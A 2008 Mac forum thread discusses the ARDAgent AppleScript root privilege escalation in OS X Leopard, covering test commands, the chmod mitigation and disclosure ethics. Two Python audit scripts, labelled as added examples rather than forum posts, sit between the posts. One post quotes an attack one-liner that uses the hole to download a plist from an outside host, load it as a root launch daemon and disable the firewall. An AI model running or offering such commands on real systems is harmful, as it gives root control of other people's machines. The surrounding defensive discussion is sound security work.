
Huge, Crazy, Ridiculous OS X Security Hole (Page 2)
Horsepoo!!!
Banned
Join Date: Jun 2003
Status: Offline
Jun 20, 2008, 11:29 AM
 
Originally Posted by besson3c View Post
What does leaving ports open have to do with this?
It has nothing to do with this except that it's related to security... I was merely making a reference to a thread about some other subject on security and trojans. Reading is hard, isn't it? But it's OK, besson3c, reading comprehension problems are probably the most common thing on the internet, so you're forgiven.
     
Peter
Addicted to MacNN
Join Date: Oct 2002
Location: England | San Francisco
Status: Offline
Jun 20, 2008, 11:35 AM
 
This isn't that bad. Ironically it'd be most severe to computers such as ones in the Apple Store.
You can't do it over SSH. You need physical access, and you need to be logged in for it to work.

I'm not saying it isn't serious - it is. But it isn't a huge crazy security hole.

This was quite neat:
Code:
osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl'
we don't have time to stop for gas
     
ghporter
Administrator
Join Date: Apr 2001
Location: San Antonio TX USA
Status: Offline
Jun 20, 2008, 12:00 PM
 
Originally Posted by Chuckit View Post
Sending Charles' example command to ARDAgent will answer the question definitively. If whoami says that ARDAgent is root, then it's vulnerable; if it says it's your user, then ARDAgent is safe.
Thanks. I was sort of confused by a number of tests presented here. Too many paths and stuff to mess with for a "is it vulnerable?" test in my opinion. Charles' (which Simon repeated) is pretty terse and hard to mess up. That's just what I was looking for.

Glenn -----OTR/L, MOT, Tx
     
besson3c
Clinically Insane
Join Date: Mar 2001
Location: yes
Status: Offline
Jun 20, 2008, 12:23 PM
 
Does WindowServer support X11 forwarding? If not, will this exploit work with an xterm?
     
mduell
Posting Junkie
Join Date: Oct 2005
Location: Houston, TX
Status: Offline
Jun 20, 2008, 12:48 PM
 
Originally Posted by Horsepoo!!! View Post
One thing's for sure, Apple can remove this page and probably should: Apple - Mac OS X Leopard - Technology - Security
Sandbox tested
Sometimes hackers try to hijack an application to run malicious code. Sandboxing helps ensure that applications do only what they’re intended to by restricting which files they can access, whether they can talk to the network, and whether they can be used to launch other applications. Helper applications in Leopard — including the software that enables Bonjour and the Spotlight indexer — are sandboxed to guard against attackers.


Did the sandbox screening process fail? Did the sandboxing analysis process fail? I doubt Apple will ever publicly answer that.
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Status: Offline
Jun 20, 2008, 12:51 PM
 
Originally Posted by mduell View Post
Did the sandbox screening process fail? Did the sandboxing analysis process fail? I doubt Apple will ever publicly answer that.
According to Apple's response to the different submissions, they don't think there is a problem.

Yeah, I know, how stupid that sounds.

-t
     
villalobos
Mac Elite
Join Date: Apr 2000
Status: Offline
Jun 20, 2008, 01:01 PM
 
Originally Posted by ghporter View Post
Thanks. I was sort of confused by a number of tests presented here. Too many paths and stuff to mess with for a "is it vulnerable?" test in my opinion. Charles' (which Simon repeated) is pretty terse and hard to mess up. That's just what I was looking for.
On that point, why do I get an error message then? Why isn't everybody vulnerable, since this does not seem to be relying on people checking some options or not?
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Jun 20, 2008, 02:41 PM
 
Originally Posted by villalobos View Post
On that point, why do I get an error message then? Why isn't everybody vulnerable, since this does not seem to be relying on people checking some options or not?
I'm guessing you're on 10.4 and getting an "AppleEvent timed out" message? I think the initial report may have been partly incorrect, because I haven't gotten the exploit to work with ARDAgent on any 10.4 Mac as of yet, only Leopard.

BTW, in case anyone else was wondering, I ran a script to test whether there are any more system utilities that have this particular set of vulnerabilities (setuid + Cocoa scripting) and I didn't find anything. I'm not an expert on AppleEvents, so it's possible I missed something, but I think ARDAgent is the only thing that users need to fix at the moment.
( Last edited by Chuckit; Jun 20, 2008 at 03:05 PM. )
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
besson3c
Clinically Insane
Join Date: Mar 2001
Location: yes
Status: Offline
Jun 20, 2008, 02:48 PM
 
Chuckit: good idea looking for other setuid root files. To anybody interested, you don't need a script to do this search, you can conduct this search by doing a:

Code:
sudo find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lg {} \;
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Jun 20, 2008, 03:00 PM
 
Well, like I said, it wasn't specifically looking for setuid. There are tons of those. I was specifically looking for setuid utilities that looked like they might support Cocoa Scripting.

Basically, what I was looking for was:
- Is it setuid?
-- Does it link to Foundation?
--- Is it an app rather than a standalone tool?

Some AppleScript guru might be able to correct me if there's something I missed with that, but that seems like a reasonable test.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
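The two audit approaches above, besson3c's `find` for setuid/setgid files and Chuckit's three-part filter (setuid, links against Foundation, lives in an application bundle), can be combined into one script. The following is an added example written for this thread, not code posted by Chuckit or besson3c. It walks a directory tree looking for setuid/setgid regular files, treats a file under `Something.app/Contents/MacOS/` as an application, and asks `otool -L` whether the binary links Foundation. Because `otool` only exists on a Mac, the linker probe is a pluggable function; `sample_linker` and `build_sample_tree` are constructed stand-ins so the script can be exercised offline. The bundle name `Scriptable.app` and the tool names are made up for the demonstration.

```python
"""Audit helper: find setuid binaries that might also accept AppleScript.

Added example for this thread, not code from any poster. Criteria follow
Chuckit's post: setuid, links Foundation, is an app bundle executable.
"""
import os
import shutil
import stat
import subprocess
import tempfile
from typing import Callable, Iterator, List


def find_setuid_files(root: str) -> Iterator[str]:
    """Yield regular files under root with the setuid or setgid bit set.

    Same test as besson3c's `find / -type f \\( -perm -04000 -o -perm -02000 \\)`.
    Unreadable directories are skipped rather than aborting the walk.
    """
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path


def is_app_bundle_executable(path: str) -> bool:
    """True when the file sits in <Name>.app/Contents/MacOS/, i.e. it is an
    application (which may carry a scripting dictionary) rather than a tool."""
    parts = path.split(os.sep)
    return (len(parts) >= 4 and parts[-2] == "MacOS"
            and parts[-3] == "Contents" and parts[-4].endswith(".app"))


def linked_libraries_otool(path: str) -> List[str]:
    """Default linker probe: parse `otool -L` output (macOS only).

    Returns [] when otool is not installed so callers can supply their own.
    """
    if shutil.which("otool") is None:
        return []
    out = subprocess.run(["otool", "-L", path], capture_output=True, text=True)
    libs = []
    for line in out.stdout.splitlines()[1:]:  # first line repeats the file name
        line = line.strip()
        if line:
            libs.append(line.split(" (")[0])  # drop "(compatibility version ...)"
    return libs


def links_foundation(libs: List[str]) -> bool:
    """Chuckit's second criterion: does the binary link Foundation.framework?"""
    return any("Foundation.framework" in lib for lib in libs)


def audit(root: str, linked_libraries: Callable[[str], List[str]] = linked_libraries_otool) -> List[str]:
    """Return setuid/setgid files under root that are app-bundle executables
    and link Foundation, sorted so results are stable."""
    suspects = []
    for path in find_setuid_files(root):
        if is_app_bundle_executable(path) and links_foundation(linked_libraries(path)):
            suspects.append(path)
    return sorted(suspects)


# --- constructed sample data for running the audit off a Mac -----------------

def build_sample_tree():
    """Create a constructed tree: one setuid app-bundle executable, one setuid
    standalone tool, one ordinary file. Returns (root, {name: path}).
    Setting u+s on a file you own requires no special privileges."""
    root = tempfile.mkdtemp(prefix="setuid-audit-")
    paths = {
        "bundle": os.path.join(root, "Scriptable.app", "Contents", "MacOS", "Scriptable"),
        "tool": os.path.join(root, "bin", "plaintool"),
        "plain": os.path.join(root, "bin", "ordinary"),
    }
    for name, path in paths.items():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\nexit 0\n")
        os.chmod(path, 0o4755 if name != "plain" else 0o755)
    return root, paths


def sample_linker(path: str) -> List[str]:
    """Constructed stand-in for otool: both executables 'link' Foundation,
    the ordinary file links nothing."""
    if path.endswith("ordinary"):
        return []
    return ["/usr/lib/libSystem.B.dylib",
            "/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation"]


if __name__ == "__main__":
    root, paths = build_sample_tree()
    print("setuid/setgid files:", sorted(find_setuid_files(root)))
    print("suspects (setuid + Foundation + app bundle):", audit(root, sample_linker))
```

On a real Mac, `audit("/")` with the default probe reproduces Chuckit's search; running it under `sudo` avoids skipping directories the walker cannot read. The filter only narrows the candidate list, so anything it returns still has to be checked by hand for a scripting dictionary, which is the caveat Chuckit himself raises.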
     
villalobos
Mac Elite
Join Date: Apr 2000
Status: Offline
Jun 20, 2008, 03:03 PM
 
Originally Posted by Chuckit View Post
I'm guessing you're on 10.4 and getting an "AppleEvent timed out" message? I think the initial report may have been partly incorrect, because I haven't gotten the exploit to work with ARDAgent on any 10.4 Mac as of yet, only Leopard.

BTW, in case anyone else was wondering, I ran a script to test whether there are any more system utilities that have this particular set of vulnerabilities (setuid + Cocoa scripting) and I didn't find anything,
Yes 10.4.11. And that's the error message I get indeed.
     
steve626
Dedicated MacNNer
Join Date: Aug 2005
Status: Offline
Jun 21, 2008, 02:11 AM
 
Originally Posted by Peter View Post
... Ironically it'd be most severe to computers such as ones in the Apple Store.
You can't do it over SSH. You need physical access, and you need to be logged in for it to work.
Well it's not that much of a threat in the Apple Store. I was in an Apple Store after closing once and the employees fanned out with portable external drives that were used to (a) reformat the internal hard drives on the store Macs and (b) restore a standard build of the OS plus applications on each store computer. I asked one of the employees why they do that and she told me that they have no idea what crazy stuff customers might put on their computers during the day, so they reformat them all and restore them back every night.
iMac Intel Core 2 Duo 2.66 GHz, 4 Gig RAM, 10.6.8
Macbook Pro Retina Display 15", 16 GB RAM, 10.7.4
iMac G5 2GHz, 1.5 GB RAM, 10.5.8
Macbook Air Core 2 Duo 4 Gig RAM, 10.6.8
     
SleePyCode
Fresh-Faced Recruit
Join Date: May 2007
Status: Offline
Jun 21, 2008, 04:01 AM
 
Thanks a lot, Apple. Due to your negligence this *rootkit* exploit had to become public and put millions of Apple users at risk, when you could have simply fixed it as it should have been 4 years ago.

Nice to know Apple has let this whole thing run for 4 years. Makes me question if I should use OS X or go Linux.
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Jun 21, 2008, 05:04 AM
 
Originally Posted by SleePyCode View Post
Thanks a lot, Apple. Due to your negligence this *rootkit* exploit had to become public and put millions of Apple users at risk, when you could have simply fixed it as it should have been 4 years ago.
You can thank CharlesS for that. It was his idea to post his findings on Slashdot instead of notifying Apple and giving them appropriate time to fix it.
     
JKT
Professional Poster
Join Date: Jan 2002
Location: London, UK
Status: Offline
Jun 21, 2008, 05:21 AM
 
Um, Charles states explicitly that he has notified Apple of this several times over the past FOUR ****ING YEARS.
     
analogika
Posting Junkie
Join Date: Feb 2005
Location: 888500128
Status: Offline
Jun 21, 2008, 05:31 AM
 
Charles is also NOT the one who posted this to Slashdot.
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Jun 21, 2008, 05:45 AM
 
Originally Posted by JKT View Post
Um, Charles states explicitly that he has notified Apple of this several times over the past FOUR ****ING YEARS.
But not that ARD Agent runs shell scripts as root when scripted if I understood him correctly. Apple should have been given sufficient time to investigate this issue before running to the media.
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Jun 21, 2008, 05:48 AM
 
Originally Posted by analogika View Post
Charles is also NOT the one who posted this to Slashdot.
Then thanks to whoever that guy was. Not.
     
CharlesS  (op)
Posting Junkie
Join Date: Dec 2000
Status: Offline
Jun 21, 2008, 10:47 AM
 
Originally Posted by analogika View Post
Charles is also NOT the one who posted this to Slashdot.
Yeah, that wasn't me. The only place I posted this on the Web was here, so you guys could know about it and chmod the binary so you wouldn't be vulnerable. And that was after the article showed up on Slashdot and the cat was already out of the bag.

And yeah, I've been letting Apple know that root accepted AppleScripts from non-root for a really freaking long time now. Hopefully now they'll find this issue important enough for their attention.
( Last edited by CharlesS; Jun 21, 2008 at 11:08 AM. )

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Jun 21, 2008, 10:56 AM
 
Originally Posted by TETENAL View Post
But not that ARD Agent runs shell scripts as root when scripted if I understood him correctly. Apple should have been given sufficient time to investigate this issue before running to the media.
Four years is a lot of time to investigate the issue considering I wrote a script that could have cracked the case in like five minutes.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Status: Offline
Jun 21, 2008, 12:10 PM
 
Originally Posted by steve626 View Post
Well it's not that much of a threat in the Apple Store. I was in an Apple Store after closing once and the employees fanned out with portable external drives that were used to (a) reformat the internal hard drives on the store Macs and (b) restore a standard build of the OS plus applications on each store computer. I asked one of the employees why they do that and she told me that they have no idea what crazy stuff customers might put on their computers during the day, so they reformat them all and restore them back every night.
Are you kidding me ? They do it manually ?

Do they have people do this all night ?

-t
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Jun 21, 2008, 12:29 PM
 
It shouldn't take more than an hour (at least at the stores I've been to) even if they only have one hard drive per employee.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Status: Offline
Jun 21, 2008, 12:36 PM
 
Originally Posted by Chuckit View Post
It shouldn't take more than an hour (at least at the stores I've been to) even if they only have one hard drive per employee.
Can't that be done automagically over LAN and Apple Remote Desktop ?

-t
     
analogika
Posting Junkie
Join Date: Feb 2005
Location: 888500128
Status: Offline
Jun 21, 2008, 03:16 PM
 
Automated and complete restore - all it takes is a reboot:

Faronics Deep Freeze Mac - ABSOLUTE Workstation Integrity
     
kupan787
Senior User
Join Date: Jun 1999
Location: San Jose, CA
Status: Offline
Jun 21, 2008, 04:08 PM
 
It's working for me, but I have a bunch of other crap being spewed out (is that normal)?

benmac:~ kupan787$ osascript -e 'tell application "ARDAgent" to do shell script "whoami"'
2008-06-21 13:08:15.377 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x137ff0 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d224af 0x90d21fae 0x90d26a5b 0xd48e6 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.379 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x139400 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d19869 0x90d23fd2 0x90d26c32 0xd48e6 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.380 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13a990 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d224af 0x90d21fae 0x90d21eb6 0x90d27f58 0xd49fc 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.380 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13a790 of class NSBundle autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0xd49fc 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.381 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13acd0 of class NSCFArray autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0x90d4b8f1 0x90d4b8ba 0xd4ad2 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.381 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13b3f0 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d19869 0x90d23fd2 0x90d23e62 0x90d4c05a 0x90d4b9bf 0x90d4b8ba 0xd4ad2 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.382 osascript[97280:10b] LCC Scroll Enhancer loaded
2008-06-21 13:08:15.383 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13d110 of class NSMachPort autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0x90d38f65 0x90d5fe4f 0xdb702 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.383 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13e3f0 of class NSCFNumber autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0xdc1b2 0xdb766 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.384 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13e830 of class NSCFString autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0x90d9a02a 0xdb766 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.384 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13e870 of class NSPathStore2 autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d1a767 0x90d28d75 0xdb782 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.384 osascript[97280:10b] *** _NSAutoreleaseNoPool(): Object 0x13ea00 of class NSCFData autoreleased with no pool in place - just leaking
Stack: (0x90e0ccdf 0x90d19562 0x90d2dc35 0x90d3b9fa 0x90d3b8b8 0x90d3b6d5 0xdb79e 0xdb5bf 0xd4b2e 0xd4b5b 0x97207f97 0x972082f6 0x921f6c74 0x921e8648 0x921f17be 0x921f45ab 0x93462caf 0x2a017a 0x2a3dfd 0x2a3fc0 0x28bc3d 0x28bf07 0x28bfa5 0x283a2d 0x929c3f31 0x97206168 0x29f6c4 0x29f7e2 0x29f915 0x29f11c 0x29f8c9 0x929c3f31 0x97217513 0x20c9)
2008-06-21 13:08:15.411 osascript[97280:10b] Error loading /Library/ScriptingAdditions/QXPScriptingAdditions.osax/Contents/MacOS/QXPScriptingAdditions: dlopen(/Library/ScriptingAdditions/QXPScriptingAdditions.osax/Contents/MacOS/QXPScriptingAdditions, 262): no suitable image found. Did find:
/Library/ScriptingAdditions/QXPScriptingAdditions.osax/Contents/MacOS/QXPScriptingAdditions: mach-o, but wrong architecture
osascript: OpenScripting.framework - scripting addition /Library/ScriptingAdditions/QXPScriptingAdditions.osax declares no loadable handlers.
root
benmac:~ kupan787$
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Jun 21, 2008, 04:27 PM
 
It looks like you have some misbehaving Scripting Addition installed.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
SleePyCode
Fresh-Faced Recruit
Join Date: May 2007
Status: Offline
Jun 21, 2008, 06:57 PM
 
I got that as well, but it did spit out the name at the end. I changed the chmod and now it spits out my name. So I feel better. I fixed it on all 3 of my macs since I do use remote desktop and management to be lazy to do stuff such as software updates

I was not attacking CharlesS or anyone else for releasing this. If Apple had done their job right over the past 4 years then this would have been fixed and not be an issue now. I see why this was made public; maybe Apple will actually fix it when they start getting lots of heat from this. Then again, maybe they will continue to mark it as working as expected.

We can only hope that 10.5.3 or a security update is released with this patched in it. But this is Apple we are talking about :|
     
Chuckit
Clinically Insane
Join Date: Oct 2001
Location: San Diego, CA, USA
Status: Offline
Jun 21, 2008, 07:06 PM
 
Well, they're no longer saying it's working properly at least.
Chuck
___
"Instead of either 'multi-talented' or 'multitalented' use 'bisexual'."
     
steve626
Dedicated MacNNer
Join Date: Aug 2005
Status: Offline
Jun 22, 2008, 01:39 AM
 
Originally Posted by turtle777 View Post
Are you kidding me ? They do it manually ?

Do they have people do this all night ?

-t
In terms of the complete erase and restore of all the Macs in the Apple Store, this was in the Glendale, California store and it was over a year ago. Then it was done manually; each employee had three or four of these firelite drives and restored three or four Macs in parallel. It seemed pretty fast, maybe a half hour or less, and since it was all done in parallel, it was pretty much all done at once. They just hooked up each external drive and ran an erase/restore script and while it was running they could go do other things.

I suspect they might do this through a network now, maybe, but in any case, they probably aren't too concerned about security risks on their computers because they wipe them and restore a standard build each night after closing, at least in that store.
iMac Intel Core 2 Duo 2.66 GHz, 4 Gig RAM, 10.6.8
Macbook Pro Retina Display 15", 16 GB RAM, 10.7.4
iMac G5 2GHz, 1.5 GB RAM, 10.5.8
Macbook Air Core 2 Duo 4 Gig RAM, 10.6.8
     
Amorya
Mac Elite
Join Date: Mar 2001
Location: England
Status: Offline
Jun 22, 2008, 06:57 PM
 
If you turn on Remote Management (in Sharing), then it appears the exploit no longer works: I get

Code:
Magrat:~ amorya$ osascript -e 'tell application "ARDAgent" to do shell script "whoami"'
31:55: execution error: ARDAgent got an error: "whoami" doesn’t understand the do shell script message. (-1708)
Amorya
What the nerd community most often fails to realize is that not all features are equal. A well implemented and well integrated feature in a convenient interface is worth way more than the same feature implemented crappily, or accessed through an annoying interface.
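The thread has now produced four distinct outcomes for Chuckit's `whoami` test: `root` (vulnerable), the caller's own name (setuid bit removed), an "AppleEvent timed out" error on 10.4, and Amorya's "doesn't understand the do shell script message" when Remote Management is enabled. The following is an added example written for this thread, not code from any poster. It runs the test on a Mac and maps the output onto those outcomes, tolerating the `NSAutoreleaseNoPool` noise that kupan787 saw by reading only the last stdout line; it also checks whether the binary still carries the setuid bit, so the `chmod` fix can be confirmed directly. The ARDAgent path is the standard Leopard location and is assumed here (the thread only says "the binary"); the sample outputs are constructed from the messages quoted in the thread.

```python
"""Classify the ARDAgent "whoami" test and confirm the setuid-bit removal.

Added example for this thread, not code from any poster.
"""
import os
import shutil
import stat
import subprocess

# Assumed: standard Leopard location of the binary the thread says to chmod.
ARDAGENT_BINARY = ("/System/Library/CoreServices/RemoteManagement/"
                   "ARDAgent.app/Contents/MacOS/ARDAgent")

# Chuckit's test, as repeated by several posters.
TEST_SCRIPT = 'tell application "ARDAgent" to do shell script "whoami"'


def classify(stdout: str, stderr: str, current_user: str) -> str:
    """Map an osascript run onto the outcomes reported in the thread.

    Only the last non-empty stdout line is treated as whoami's answer, so
    NSLog noise from misbehaving Scripting Additions does not confuse it.
    """
    if current_user == "root":
        return "run as a regular user"   # test is meaningless from root
    errors = (stdout + "\n" + stderr).replace("\u2019", "'")
    lines = [ln.strip() for ln in stdout.splitlines() if ln.strip()]
    answer = lines[-1] if lines else ""
    if answer == "root":
        return "vulnerable"              # ARDAgent ran the command as root
    if answer == current_user:
        return "not vulnerable"          # ran as the caller: setuid bit is gone
    if "doesn't understand the do shell script message" in errors:
        return "not scriptable"          # Remote Management on (Amorya's case)
    if "timed out" in errors:
        return "no response"             # AppleEvent timed out (10.4 reports)
    return "unknown"


def run_check(current_user: str = None) -> str:
    """Run the test on this machine. Returns 'no osascript' off a Mac so the
    function is safe to call anywhere."""
    if shutil.which("osascript") is None:
        return "no osascript"
    user = current_user or os.environ.get("USER", "")
    try:
        proc = subprocess.run(["osascript", "-e", TEST_SCRIPT],
                              capture_output=True, text=True, timeout=60)
    except subprocess.TimeoutExpired:
        return "no response"
    return classify(proc.stdout, proc.stderr, user)


def setuid_bit_set(path: str = ARDAGENT_BINARY):
    """True if the binary still carries the setuid bit (fix not applied),
    False once it has been chmod'ed, None if the path does not exist here."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return bool(st.st_mode & stat.S_ISUID)


# Constructed samples modelled on the outputs quoted in the thread.
SAMPLES = {
    "noisy root (kupan787)": (
        "root\n",
        "2008-06-21 13:08:15.377 osascript[97280:10b] *** _NSAutoreleaseNoPool(): "
        "Object 0x137ff0 of class NSPathStore2 autoreleased with no pool in place - just leaking\n",
        "kupan787"),
    "fixed": ("kupan787\n", "", "kupan787"),
    "remote management on (Amorya)": (
        "",
        "31:55: execution error: ARDAgent got an error: \"whoami\" doesn\u2019t "
        "understand the do shell script message. (-1708)\n",
        "amorya"),
    "10.4 (villalobos)": ("", "execution error: AppleEvent timed out. (-1712)\n", "villalobos"),
}


if __name__ == "__main__":
    for label, (out, err, user) in SAMPLES.items():
        print(f"{label:32s} -> {classify(out, err, user)}")
    print("live check:", run_check())
    print("setuid bit on ARDAgent:", setuid_bit_set())
```

Amorya's observation is worth reading alongside `setuid_bit_set`: a "not scriptable" result means the test no longer works, not that the binary is no longer setuid root, so the bit check is the one that confirms the mitigation.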
     
larkost
Mac Elite
Join Date: Oct 1999
Location: San Jose, Ca
Status: Offline
Jun 22, 2008, 08:50 PM
 
Originally Posted by steve626 View Post
In terms of the complete erase and restore of all the Macs in the Apple Store, this was in the Glendale, California store and it was over a year ago. Then it was done manually; each employee had three or four of these firelite drives and restored three or four Macs in parallel. It seemed pretty fast, maybe a half hour or less, and since it was all done in parallel, it was pretty much all done at once. They just hooked up each external drive and ran an erase/restore script and while it was running they could go do other things.

I suspect they might do this through a network now, maybe, but in any case, they probably aren't too concerned about security risks on their computers because they wipe them and restore a standard build each night after closing, at least in that store.
I would be really surprised if they were not using some sort of NetRestore at this point. And given an ASR-scanned dmg the restore (remote or disk-to-disk) should take no more than 15 minutes per disk (assuming a really large disk).

I have a system that can restore a computer over the network (complete disk wipe and restore) in about 12 minutes and is remotely trigger-able.
     
moep
Senior User
Join Date: Nov 2003
Status: Offline
Jun 23, 2008, 12:03 AM
 
Here we go.

Flaw in Apple Remote Desktop exploited via trojan

Apple deserves this one. Still no reaction, it seems.
"The road to success is dotted with the most tempting parking spaces."
     
C.A.T.S. CEO
Professional Poster
Join Date: Nov 2004
Location: eating kernel
Status: Offline
Jun 23, 2008, 12:07 AM
 
Signature depreciated.
     
Arkham_c
Mac Elite
Join Date: Dec 2001
Location: Atlanta, GA, USA
Status: Offline
Jun 23, 2008, 09:45 AM
 
The thing is, all someone would have to do is write a simple game or utility, and use the Apple Installer that requires your password to install, then put the game up on Versiontracker, and you'd easily infect 10,000 machines without exploiting any flaws at all. People are used to giving their password during an install, so they would do so without raising suspicion.

Social engineering has always been the most effective way to compromise systems, and always will be,

In related news, try my new game on versiontracker!

Mac Pro 2x 2.66 GHz Dual core, Apple TV 160GB, two Windows XP PCs
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Jun 23, 2008, 10:02 AM
 
